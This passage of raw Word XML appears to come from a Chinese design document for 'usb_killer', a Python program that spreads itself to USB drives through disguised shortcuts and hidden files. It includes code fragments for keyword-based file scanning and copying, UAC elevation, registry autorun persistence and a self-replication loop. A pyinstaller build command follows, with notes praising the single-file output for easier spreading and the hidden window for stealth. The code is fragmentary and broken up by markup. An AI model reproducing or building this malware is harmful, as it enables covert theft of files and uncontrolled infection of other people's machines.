                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">shortcut.TargetPath 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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>os.path.abspath(f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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>"{DISGUISE_NAME}.exe"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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F493BC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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">shortcut.Arguments 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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>f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22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>'--open-dir "{DISGUISE_NAME}"'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7621C81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22"/>
                <w:szCs w:val="22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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>shortcut. Save()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FB7CF93">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>6. 文件扫描模块 (FileScanner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301EE566">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>scan_copy()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66F4AE">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243CF162">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FC406D">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>多条件过滤机制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B358A1"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文件扩展名黑名单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061028E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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100MB大小限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FCAAA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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关键词匹配（文件名+内容）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A084B"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基于哈希值的去重</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D8E8B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>核心算法：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="861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22"/>
        <w:gridCol w:w="7997"/>
      </w:tblGrid>
      <w:tr w14:paraId="49E14C1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0" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="622" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="664ECD4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  <w:p w14:paraId="3F8DD46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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12EE556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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61DD285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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FBA53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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C54A74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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="79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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="5BDC2B1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 xml:space="preserve">root, _, files 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os.walk(path):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBA1EE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file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files:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D57D90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 xml:space="preserve">file_path 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 xml:space="preserve">os.path.join(root,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file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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="164F42D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not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self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._should_skip(file_path):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EE59E2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self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._is_target_file(file_path):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BAE147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          self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.copy_item(file_path)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1513F81E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>_is_target_file()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B633C3F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>技术细节：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6580BA72">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019CD767">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>多级匹配策略：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A268348">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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文件名包含关键词</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D0C90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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文本文件内容检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A490162">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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特定扩展名(.docx/.xlsx等)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC052A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>匹配逻辑：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="84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10"/>
        <w:gridCol w:w="7849"/>
      </w:tblGrid>
      <w:tr w14:paraId="6A8D237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4" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="07C3647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  <w:p w14:paraId="4EE4B82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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B69AA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78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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="67D98EC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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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(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any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 xml:space="preserve">(kw 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 xml:space="preserve">filename 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 xml:space="preserve">kw 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 xml:space="preserve">KEYWORDS) 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or</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B94644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20"/>
                <w:szCs w:val="20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 xml:space="preserve">(file_ext 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 xml:space="preserve">TEXT_TYPES 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and</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5020FE9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20"/>
                <w:szCs w:val="20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         self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._check_content(file_path)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BBC790C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>7. 主控模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF32D63">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD8596">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>执行流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504BE6BA">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D839A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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权限检查 → 提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395372B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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初始化加密环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456E9D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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建立持久化机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D6E77E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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启动监控循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925A8AC">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>关键时序：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="867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25"/>
        <w:gridCol w:w="8054"/>
      </w:tblGrid>
      <w:tr w14:paraId="1F5C4FF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1" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="625" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="373ED11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01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B16C72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02</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1914AC8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03</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038036A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04</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BAD9CA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05</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B5888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06</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FF6F54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07</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397E10C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08</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7886EBC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09</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462FE69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10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788F107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11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A56735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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="1EFC61A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not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USBManager.is_admin():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46FBB9E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 xml:space="preserve">ctypes.windll.shell32.ShellExecuteW(...) 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8200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# UAC提权</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0063204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  <w:p w14:paraId="66F5ECE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while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True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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="084446E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 xml:space="preserve">current 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USBManager.check_new_usb()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B31033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 xml:space="preserve">usb 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 xml:space="preserve">(current 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last):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43DAF70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USBManager.check_admin_marker(usb):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE307C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FileScanner.copy_to_admin_usb(usb)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1655A52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else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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC833C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SelfReplicator.spread_to_usb(usb)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D1FAF1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FileScanner.scan_copy(usb)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333E0A4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 xml:space="preserve">last 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current</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55AB8E12">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C26E98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#使用pyinstaller打包程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080F3E8"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确保安装（pip install pyinstaller）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB9D1C"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在命令提示符环境（或终端）输入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="807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83"/>
        <w:gridCol w:w="7496"/>
      </w:tblGrid>
      <w:tr w14:paraId="31F9DEB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583" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:color="6CE26C" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:right w:w="38" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="57F6407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74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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="4E6084E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 xml:space="preserve">pyinstaller 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--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 xml:space="preserve">onefile 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--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 xml:space="preserve">windowed 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--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icon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=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 xml:space="preserve">app.ico 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--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add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-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 xml:space="preserve">data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"crypto.key;."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--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add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-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 xml:space="preserve">data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"admin_token.txt;."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--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key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=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 xml:space="preserve">MySecretKey123 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--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upx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-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BEB9B3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dir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=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.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/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upx usb_killer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2883AF88">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E0186E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参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179561BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="147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--onefile：生成单个 .exe 文件（便于传播）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3505F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="147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--windowed：隐藏控制台窗口（增强隐蔽性）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37A99F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="147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--icon=app.ico：自定义程序图标（可选）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB39AC"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打包后文件结构：​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB73B8"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dist/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5121F"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└── usb_killer.exe  # 最终可执行文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4054CB1A"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build/              # 临时文件（可删除）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F097C6B">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D24BC69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>关键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E110EB1">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>1. 系统操作核心库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413CF69F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C75651">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：提供操作系统底层接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D4802">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9872F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • os.path：处理路径拼接/检测(join, exists, basename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB611D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • os.environ：读取系统环境变量(如APPDATA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C8C0F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • os.makedirs：递归创建目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF1410">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • os.access：检查文件权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35544ED3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923D705">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：访问解释器相关功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062B75F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63735C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • sys.executable：获取当前程序绝对路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B250A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • sys.argv：读取命令行参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCF2B4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • sys.exit()：强制退出程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE31C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>ctypes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398CBDE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：调用Windows API的Python接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B8299">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7684640E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • windll.kernel32.SetFileAttributesW：设置文件隐藏属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFD55C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • windll.shell32.IsUserAnAdmin：检测管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DAEC36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • wintypes.LPCWSTR：处理Windows Unicode字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE2F0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>winreg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B86169">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：操作Windows注册表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74970724">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 关键用途：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604458B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • OpenKey/SetValueEx：修改注册表实现开机自启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0213B110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">  • HKEY_CURRENT_USER：当前用户注册表分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC14E4">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2. 文件处理库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB16D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>shutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9BE18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>• 功能：高级文件操作</w:t>
      </w:r>
    </w:p>
